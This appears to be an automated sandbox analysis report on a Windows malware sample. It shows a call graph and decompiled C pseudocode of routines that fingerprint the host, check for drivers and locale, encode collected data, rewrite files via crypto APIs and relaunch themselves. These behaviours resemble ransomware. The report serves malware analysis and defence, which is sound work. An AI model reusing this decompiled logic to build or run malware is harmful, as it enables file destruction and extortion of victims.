2122->2124 2123->2124 2125 f9d4fd3 CreatePipe SetHandleInformation 2123->2125 2124->2088 2125->2124 2126 f9d4ffc VirtualAlloc 2125->2126 2127 f9d504b lstrcpyA 2126->2127 2128 f9d5016 wsprintfW 2126->2128 2127->2088 2133 f9d4c40 2128->2133 2130 f9d502b 2138 f9d4de0 2130->2138 2134 f9d9010 _memset 2133->2134 2135 f9d4c5e CreateProcessW 2134->2135 2136 f9d4ca9 GetLastError 2135->2136 2137 f9d4cb4 CloseHandle CloseHandle 2135->2137 2136->2130 2137->2130 2143 f9d4ded 2138->2143 2139 f9d4df6 ReadFile 2140 f9d4e65 2139->2140 2139->2143 2141 f9d4e83 VirtualFree 2140->2141 2144 f9d4cd0 2140->2144 2141->2088 2143->2139 2143->2140 2147 f9d4cfb 2144->2147 2145 f9d4d35 lstrcpyA 2145->2141 2146 f9d4d93 lstrlenA 2149 f9d4da0 lstrcpyA 2146->2149 2147->2145 2147->2146 2148 f9d4d8d 2147->2148 2148->2145 2149->2141 2165 f9d32b0 lstrlenA 2151->2165 2154 f9d34d9 ExitProcess 2156 f9d3412 2156->2111 2156->2112 2158 f9d3483 lstrlenA GetProcessHeap HeapAlloc 2159 f9d3407 2158->2159 2160 f9d34a5 lstrcpyA 2158->2160 2159->2156 2159->2158 2169 f9d3190 2159->2169 2173 f9d3200 2159->2173 2160->2159 2162 f9d51f9 ExitProcess 2161->2162 2163 f9d51c0 GetModuleFileNameW 2161->2163 2163->2162 2164 f9d51d2 wsprintfW ShellExecuteW 2163->2164 2164->2162 2166 f9d32cf 2165->2166 2167 f9d32f8 2165->2167 2168 f9d32d0 lstrlenA 2166->2168 2167->2154 2167->2159 2168->2167 2168->2168 2170 f9d319e 2169->2170 2171 f9d31b0 lstrcmpiA lstrcmpiA 2169->2171 2170->2171 2172 f9d31f1 2170->2172 2171->2159 2172->2159 2174 f9d3210 2173->2174 2175 f9d323d 2174->2175 2176 f9d326d 2174->2176 2177 f9d3250 lstrlenA GetProcessHeap HeapAlloc 2174->2177 2175->2159 2179 f9d3299 2176->2179 2180 f9d3272 lstrlenA GetProcessHeap HeapAlloc 2176->2180 2178 f9d328d 2177->2178 2178->2179 2181 f9d3291 lstrcpyA 2178->2181 2179->2159 2180->2178 2181->2179 2182->1844 2184 f9d569c wsprintfW 2183->2184 2209 f9d39f0 GetProcessHeap 2184->2209 2187 f9d56ef 2188 f9d7330 98 API calls 2187->2188 2189 f9d56fa 2188->2189 2190 f9d7140 16 API calls 2189->2190 2191 f9d5705 lstrlenW 2190->2191 2192 f9d6f40 49 API calls 2191->2192 2193 f9d571d lstrlenW 2192->2193 2194 f9d9010 _memset 2193->2194 2195 f9d5766 lstrlenA 2194->2195 2196 f9d5782 2195->2196 2197 f9d5797 CryptBinaryToStringA 2196->2197 2198 f9d57bc GetLastError 2197->2198 2199 f9d57c2 lstrlenA VirtualAlloc lstrlenA 2197->2199 2198->2199 2200 f9d57ee lstrlenA 2199->2200 2202 f9d5822 2200->2202 2206 f9d5805 lstrlenA 2200->2206 2203 f9d54a0 97 API calls 2202->2203 2205 f9d582e VirtualFree 2203->2205 2207 f9d7c10 10 API calls 2205->2207 2206->2202 2208 f9d585d VirtualFree 2207->2208 2208->1852 2209->2187 2223 f9d2d10 SendMessageW ExitThread 2224 f9d2d30 2245 f9d2f50 EnumDeviceDrivers 2224->2245 2226 f9d2d8c 2227 f9d2de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2226->2227 2230 f9d2f50 7 API calls 2226->2230 2228 f9d2e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2227->2228 2229 f9d2e75 ExitThread 2227->2229 2231 f9d2ebe ExitThread 2228->2231 2232 f9d2ec5 ShowWindow UpdateWindow CreateThread 2228->2232 2233 f9d2d99 2230->2233 2234 f9d2eed CloseHandle 2232->2234 2235 f9d2ef4 GetMessageW 2232->2235 2233->2227 2238 f9d2f50 7 API calls 2233->2238 2234->2235 2236 f9d2f3d ExitThread 2235->2236 2237 f9d2f0b 2235->2237 2239 f9d2f17 TranslateMessage DispatchMessageW 2237->2239 2240 f9d2dce 2238->2240 2239->2236 2241 f9d2f2c GetMessageW 2239->2241 2240->2236 2255 f9d30a0 2240->2255 2241->2236 2241->2239 2246 f9d2f7d 2245->2246 2247 f9d2f82 VirtualAlloc 2245->2247 2246->2226 2248 f9d2f9f EnumDeviceDrivers 2247->2248 2249 f9d2f99 2247->2249 2250 f9d2fae 2248->2250 2251 f9d2ff2 VirtualFree 2248->2251 2249->2226 2250->2251 2252 f9d2fc0 GetDeviceDriverBaseNameW 2250->2252 2251->2226 2252->2250 2253 f9d2fd9 lstrcmpiW 2252->2253 2253->2250 2254 f9d3009 VirtualFree 2253->2254 2254->2226 2256 f9d2f50 7 API calls 2255->2256 2257 f9d3151 2256->2257 2258 f9d2f50 7 API calls 2257->2258 2263 f9d2ddb 2257->2263 2259 f9d3160 2258->2259 2260 f9d2f50 7 API calls 2259->2260 2259->2263 2261 f9d316c 2260->2261 2262 f9d2f50 7 API calls 2261->2262 2261->2263 2262->2263 2263->2236 2264 f9d2ad0 VirtualAlloc 2263->2264 2265 f9d2b02 GetModuleFileNameW GetTempPathW 2264->2265 2267 f9d2b48 2265->2267 2268 f9d2b4c 2267->2268 2269 f9d2b53 lstrlenW 2267->2269 2307 f9d2960 lstrlenW 2268->2307 2279 f9d8150 CryptAcquireContextW 2269->2279 2271 f9d2b8e GetEnvironmentVariableW 2273 f9d2bac 2271->2273 2275 f9d2bd8 lstrcatW lstrcatW lstrcatW 2273->2275 2278 f9d2bb0 2273->2278 2274 f9d2c45 ExitThread 2290 f9d2890 CreateFileW 2275->2290 2277 f9d2c2f wsprintfW 2277->2268 2278->2274 2278->2277 2280 f9d8269 2279->2280 2281 f9d817b 2279->2281 2280->2271 2281->2281 2282 f9d818e VirtualAlloc 2281->2282 2283 f9d81ab 2282->2283 2284 f9d8272 CryptReleaseContext VirtualFree 2282->2284 2283->2284 2285 f9d81b3 GetModuleHandleA 2283->2285 2284->2271 2286 f9d81f9 LoadLibraryA 2285->2286 2287 f9d8207 GetProcAddress 2285->2287 2286->2287 2289 f9d8216 CryptReleaseContext VirtualFree 2286->2289 2287->2289 2289->2280 2291 f9d28f9 2290->2291 2292 f9d28b8 GetFileSize 2290->2292 2291->2278 2312 f9d3030 2292->2312 2295 f9d3030 7 API calls 2296 f9d28d5 CreateFileMappingW 2295->2296 2297 f9d2902 MapViewOfFile 2296->2297 2298 f9d28f2 CloseHandle 2296->2298 2299 f9d2948 CloseHandle CloseHandle 2297->2299 2300 f9d2916 2297->2300 2298->2291 2299->2278 2301 f9d3030 7 API calls 2300->2301 2302 f9d291b 2301->2302 2303 f9d292b 2302->2303 2317 f9d82a0 CryptAcquireContextW 2302->2317 2328 f9d2830 CreateFileW 2303->2328 2308 f9d8150 9 API calls 2307->2308 2309 f9d29ad RegCreateKeyExW 2308->2309 2310 f9d2a8e lstrlenW RegSetValueExW RegCloseKey 2309->2310 2311 f9d2ac0 2309->2311 2310->2274 2311->2274 2313 f9d2f50 7 API calls 2312->2313 2314 f9d307f 2313->2314 2315 f9d2f50 7 API calls 2314->2315 2316 f9d28c8 2314->2316 2315->2316 2316->2295 2318 f9d82ce VirtualAlloc 2317->2318 2319 f9d8392 2317->2319 2321 f9d82f8 2318->2321 2322 f9d839b CryptReleaseContext VirtualFree 2318->2322 2319->2303 2321->2322 2323 f9d8301 GetModuleHandleA 2321->2323 2322->2303 2324 f9d8355 GetProcAddress 2323->2324 2325 f9d8347 LoadLibraryA 2323->2325 2326 f9d8379 CryptReleaseContext VirtualFree 2324->2326 2327 f9d8364 2324->2327 2325->2324 2325->2326 2326->2319 2327->2326 2329 f9d287f UnmapViewOfFile 2328->2329 2330 f9d285b 2328->2330 2329->2299 2331 f9d285f WriteFile 2330->2331 2332 f9d2873 2330->2332 2331->2332 2333 f9d2878 CloseHandle 2331->2333 2332->2333 2333->2329 2334 f9d2c50 2335 f9d2c7b 2334->2335 2336 f9d2cda CreateThread DestroyWindow 2334->2336 2337 f9d2c97 BeginPaint lstrlenW TextOutW EndPaint 2335->2337 2338 f9d2c80 DefWindowProcW 2335->2338 2482 f9d90a0 IsProcessorFeaturePresent 2483 f9d90c6 2482->2483 2484 f9d5ec0 2485 f9d5ee2 2484->2485 2486 f9d5f0e GetPEB 2485->2486 2487 f9d5f28 2486->2487 2488 f9d6de0 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2489 f9d6c90 111 API calls 2488->2489 2490 f9d6e70 VirtualFree ExitThread 2489->2490

                                        Callgraph

                                        • Executed
                                        • Not Executed
                                        • Opacity -> Relevance
                                        • Disassembly available
                                        callgraph 0 Function_0F9D8D9C 1 Function_0F9D6C90 1->1 50 Function_0F9D6BE0 1->50 80 Function_0F9D6950 1->80 89 Function_0F9D6A40 1->89 90 Function_0F9D6640 1->90 2 Function_0F9D3190 3 Function_0F9D4E90 43 Function_0F9D4DE0 3->43 91 Function_0F9D4C40 3->91 4 Function_0F9D6790 5 Function_0F9D2890 19 Function_0F9D82A0 5->19 67 Function_0F9D3030 5->67 69 Function_0F9D2830 5->69 6 Function_0F9D5190 7 Function_0F9D6E90 36 Function_0F9D7EF0 7->36 49 Function_0F9D7CE0 7->49 8 Function_0F9D8090 9 Function_0F9D6390 10 Function_0F9D8990 11 Function_0F9D5880 18 Function_0F9D54A0 11->18 40 Function_0F9D39F0 11->40 54 Function_0F9D9010 11->54 57 Function_0F9D7C10 11->57 70 Function_0F9D7330 11->70 77 Function_0F9D5E20 11->77 88 Function_0F9D6F40 11->88 92 Function_0F9D7140 11->92 94 Function_0F9D5D70 11->94 12 Function_0F9D5EB0 13 Function_0F9D62B0 14 Function_0F9D72B0 15 Function_0F9D32B0 16 Function_0F9D64B0 17 Function_0F9D48A8 21 Function_0F9D53A0 18->21 18->36 18->49 53 Function_0F9D5210 18->53 18->54 97 Function_0F9D5060 18->97 20 Function_0F9D90A0 22 Function_0F9D3AA0 23 Function_0F9D30A0 84 Function_0F9D2F50 23->84 24 Function_0F9D4BD5 35 Function_0F9D64F0 24->35 25 Function_0F9D41D6 25->8 25->57 26 Function_0F9D4CD0 27 Function_0F9D2AD0 27->5 27->8 86 Function_0F9D8150 27->86 98 Function_0F9D2960 27->98 28 Function_0F9D63D0 29 Function_0F9D8DCC 30 Function_0F9D8FC4 31 Function_0F9D89C0 32 Function_0F9D83C0 33 Function_0F9D5EC0 33->12 34 Function_0F9D8DF4 36->49 37 Function_0F9D46F0 38 Function_0F9D4BF0 82 Function_0F9D4950 38->82 39 Function_0F9D34F0 41 Function_0F9D8EE9 42 Function_0F9D43E0 74 Function_0F9D3B20 42->74 43->10 43->26 44 Function_0F9D33E0 44->2 44->15 62 Function_0F9D3200 44->62 78 Function_0F9D3320 44->78 45 Function_0F9D35E0 45->19 45->28 45->31 45->32 64 Function_0F9D3500 45->64 72 Function_0F9D6530 45->72 46 Function_0F9D3BE0 46->22 46->74 47 Function_0F9D6DE0 47->1 48 Function_0F9D69E0 51 Function_0F9D40E0 51->8 51->40 51->57 51->70 51->88 51->92 52 Function_0F9D2D10 53->6 53->44 53->54 53->77 53->94 55 Function_0F9D8C10 56 Function_0F9D7A10 58 Function_0F9D6D09 58->1 58->80 59 Function_0F9D4C0B 60 Function_0F9D4600 60->40 60->57 60->70 60->88 60->92 61 Function_0F9D4000 61->16 61->35 73 Function_0F9D3E20 61->73 63 Function_0F9D8100 76 Function_0F9D1020 64->76 65 Function_0F9D7A00 66 Function_0F9D4930 67->84 68 Function_0F9D4030 70->7 70->14 70->56 85 Function_0F9D8950 70->85 71 Function_0F9D2D30 71->23 71->27 71->84 72->39 93 Function_0F9D5670 73->93 74->54 75 Function_0F9D1C20 79 Function_0F9D6420 79->13 80->4 80->45 81 Function_0F9D6850 80->81 82->9 82->11 82->22 82->28 82->37 82->42 82->46 82->51 82->60 82->61 82->66 82->68 82->73 82->79 83 Function_0F9D2C50 87 Function_0F9D8C48 89->48 89->63 90->8 91->54 93->18 93->40 93->54 93->57 93->70 93->77 93->88 93->92 93->94 94->54 95 Function_0F9D8C6C 96 Function_0F9D8D6E 97->3 98->86

                                        Executed Functions

                                        Function 0F9D4950 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182threadsleepmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4950() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F9D4600(_t90, _t106); // executed
				if(_t54 == 0) {
					_v8 = CreateThread(0, 0, E0F9D2D30, 0, 0, 0);
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8);
					}
					E0F9D46F0();
					E0F9D40E0(_t90, _t106);
					E0F9D6420( &_v80);
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F9D63D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F9D4930(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F9D5880(_v28, _v44, _v40, _v36,  &_v16);
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F9D6390( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F9D4030();
							InitializeCriticalSection(0xf9e2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F9D3E20( &_v80);
							} else {
								E0F9D4000(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf9e2a48);
							__eflags = E0F9D3AA0();
							if(__eflags != 0) {
								E0F9D43E0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F9D3BE0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf9e2a44;
							if( *0xf9e2a44 != 0) {
								_t97 =  *0xf9e2a44; // 0x60000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F9D3BE0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0); // executed
			}






















                                        0x0f9d495b
                                        0x0f9d4961
                                        0x0f9d4968
                                        0x0f9d4987
                                        0x0f9d498e
                                        0x0f9d49a4
                                        0x0f9d49a8
                                        0x0f9d49ac
                                        0x0f9d49ac
                                        0x0f9d49b2
                                        0x0f9d49b6
                                        0x0f9d49b6
                                        0x0f9d49bc
                                        0x0f9d49c1
                                        0x0f9d49c9
                                        0x0f9d49ce
                                        0x0f9d49d5
                                        0x0f9d49dc
                                        0x0f9d49e3
                                        0x0f9d49fd
                                        0x0f9d4a02
                                        0x0f9d4a09
                                        0x0f9d4a1a
                                        0x0f9d4a6b
                                        0x0f9d4a83
                                        0x0f9d4a88
                                        0x0f9d4a8d
                                        0x0f9d4a9c
                                        0x0f9d4a8f
                                        0x0f9d4a94
                                        0x0f9d4a94
                                        0x0f9d4aa3
                                        0x0f9d4aa8
                                        0x0f9d4aad
                                        0x0f9d4ab4
                                        0x0f9d4abb
                                        0x0f9d4ac2
                                        0x0f9d4ac9
                                        0x0f9d4acd
                                        0x0f9d4b1f
                                        0x0f9d4b1f
                                        0x0f9d4b29
                                        0x0f9d4b2f
                                        0x0f9d4b33
                                        0x0f9d4b45
                                        0x0f9d4b35
                                        0x0f9d4b3b
                                        0x0f9d4b3b
                                        0x0f9d4b4f
                                        0x0f9d4b5a
                                        0x0f9d4b5c
                                        0x0f9d4b5e
                                        0x0f9d4b5e
                                        0x0f9d4b77
                                        0x0f9d4b7a
                                        0x0f9d4b7e
                                        0x0f9d4b8b
                                        0x0f9d4b94
                                        0x0f9d4ba4
                                        0x0f9d4ba4
                                        0x0f9d4baa
                                        0x0f9d4bb1
                                        0x0f9d4bb9
                                        0x0f9d4bc7
                                        0x0f9d4bc7
                                        0x0f9d4bcf
                                        0x0f9d4bcf
                                        0x0f9d4ad9
                                        0x0f9d4aef
                                        0x0f9d4b06
                                        0x0f9d4b0c
                                        0x0f9d4b0e
                                        0x0f9d4b18
                                        0x00000000
                                        0x0f9d4b18
                                        0x0f9d4b12
                                        0x0f9d4a1c
                                        0x0f9d4a30
                                        0x0f9d4a33
                                        0x0f9d4a37
                                        0x0f9d4a44
                                        0x0f9d4a4d
                                        0x0f9d4a5d
                                        0x0f9d4a5d
                                        0x0f9d4a65
                                        0x0f9d4a65
                                        0x0f9d4a1a
                                        0x0f9d496c

                                        APIs
                                        • Sleep.KERNELBASE(000003E8), ref: 0F9D495B
                                          • Part of subcall function 0F9D4600: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                          • Part of subcall function 0F9D4600: lstrcpyW.KERNEL32 ref: 0F9D467F
                                          • Part of subcall function 0F9D4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                          • Part of subcall function 0F9D4600: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                          • Part of subcall function 0F9D4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        • ExitProcess.KERNEL32 ref: 0F9D496C
                                        • CreateThread.KERNEL32 ref: 0F9D4981
                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F9D4999
                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0F9D49AC
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D49B6
                                        • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F9D4A2A
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D4A44
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4A5D
                                        • ExitProcess.KERNEL32 ref: 0F9D4A65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                        • String ID: open
                                        • API String ID: 1803241880-2758837156
                                        • Opcode ID: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction ID: fdc6b6d1c67c11643e8d9a4aae9d46fc8452dfa71bc028d6fef35184dbc77727
                                        • Opcode Fuzzy Hash: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction Fuzzy Hash: DC710D70A45309ABEB14DBA4DC5AFEE7B78AB44716F308014F2017A1C2DBB86994CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7330 Relevance: 142.2, APIs: 55, Strings: 26, Instructions: 499memorystringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 f9d7330-f9d7347 1 f9d736e-f9d7372 0->1 2 f9d7349-f9d7368 VirtualAlloc GetUserNameW 0->2 3 f9d7374-f9d7390 VirtualAlloc GetComputerNameW 1->3 4 f9d7396-f9d73a0 1->4 2->1 3->4 5 f9d73f6-f9d73fa 4->5 6 f9d73a2-f9d73b7 VirtualAlloc 4->6 7 f9d7495-f9d7499 5->7 8 f9d7400-f9d743a VirtualAlloc RegOpenKeyExW 5->8 6->5 9 f9d73b9-f9d73cf call f9d72b0 6->9 12 f9d749f-f9d74cd VirtualAlloc * 2 7->12 13 f9d7599-f9d759d 7->13 10 f9d743c-f9d745e RegQueryValueExW 8->10 11 f9d747e-f9d748f VirtualFree 8->11 20 f9d73d4-f9d73d6 9->20 15 f9d7469 GetLastError 10->15 16 f9d7460-f9d7467 10->16 11->7 19 f9d74d4-f9d7507 wsprintfW RegOpenKeyExW 12->19 17 f9d759f-f9d75cf VirtualAlloc call f9d72b0 13->17 18 f9d75fb-f9d75ff 13->18 21 f9d746f-f9d747c RegCloseKey 15->21 16->21 17->18 43 f9d75d1-f9d75f8 call f9d72b0 wsprintfW 17->43 25 f9d766e-f9d7672 18->25 26 f9d7601-f9d7622 GetNativeSystemInfo VirtualAlloc 18->26 23 f9d7509-f9d7529 RegQueryValueExW 19->23 24 f9d7564-f9d7566 19->24 27 f9d73e9-f9d73ee 20->27 28 f9d73d8-f9d73df 20->28 21->7 21->11 34 f9d752b-f9d7532 23->34 35 f9d7534 GetLastError 23->35 30 f9d7569-f9d756c 24->30 31 f9d768f-f9d7693 25->31 32 f9d7674-f9d768a call f9d7a10 25->32 36 f9d7624-f9d762b 26->36 37 f9d7663 26->37 29 f9d73f1-f9d73f3 wsprintfW 27->29 28->5 38 f9d73e1-f9d73e7 28->38 29->5 39 f9d756e-f9d7570 30->39 40 f9d7576-f9d7593 wsprintfW VirtualFree 30->40 44 f9d77d9 31->44 45 f9d7699-f9d7727 VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW call f9d72b0 31->45 32->31 60 f9d768c 32->60 46 f9d753a-f9d7547 RegCloseKey 34->46 35->46 36->37 47 f9d765c-f9d7661 36->47 48 f9d764e-f9d7653 36->48 49 f9d7655-f9d765a 36->49 50 f9d7647-f9d764c 36->50 51 f9d7632-f9d7641 wsprintfW ExitProcess 36->51 41 f9d7668-f9d766b wsprintfW 37->41 38->29 39->19 39->40 40->13 41->25 43->18 52 f9d77df-f9d77e3 44->52 66 f9d7729-f9d7755 lstrlenW call f9d72b0 45->66 67 f9d775a-f9d779b wsprintfW lstrcatW GetModuleHandleW GetProcAddress 45->67 46->24 56 f9d7549-f9d7559 lstrcmpiW 46->56 47->41 48->41 49->41 50->41 58 f9d77e9-f9d7839 VirtualAlloc 52->58 59 f9d7992-f9d7999 52->59 56->51 57 f9d755f-f9d7562 56->57 57->30 63 f9d7840-f9d784b 58->63 64 f9d799b-f9d79b7 VirtualAlloc 59->64 65 f9d79e0-f9d79eb 59->65 60->31 63->63 73 f9d784d-f9d785f 63->73 71 f9d79b9-f9d79c2 call f9d6e90 64->71 72 f9d79d6 64->72 66->67 69 f9d779d-f9d77b7 lstrlenW 67->69 70 f9d77b9 67->70 74 f9d77c0-f9d77d7 VirtualFree 69->74 70->74 71->65 83 f9d79c4-f9d79d0 VirtualFree 71->83 72->65 75 f9d7862-f9d787a GetDriveTypeW 73->75 74->52 79 f9d796d 75->79 80 f9d7880-f9d7883 75->80 82 f9d7973-f9d797d 79->82 80->79 81 f9d7889-f9d78d0 lstrcatW * 3 GetDiskFreeSpaceW 80->81 85 f9d78d6-f9d7961 call f9d8950 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 81->85 86 f9d7963-f9d796b lstrcatW 81->86 82->75 84 f9d7983-f9d798d lstrlenW 82->84 83->72 84->59 85->82 86->79
                                        C-Code - Quality: 88%
                                        			E0F9D7330(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t166;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t224;
				int _t230;
				void* _t238;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4);
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								if(E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80) == 0) {
									_push(_t260);
									E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F9D7A10(_t279 + 0x2c,  &_v28);
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
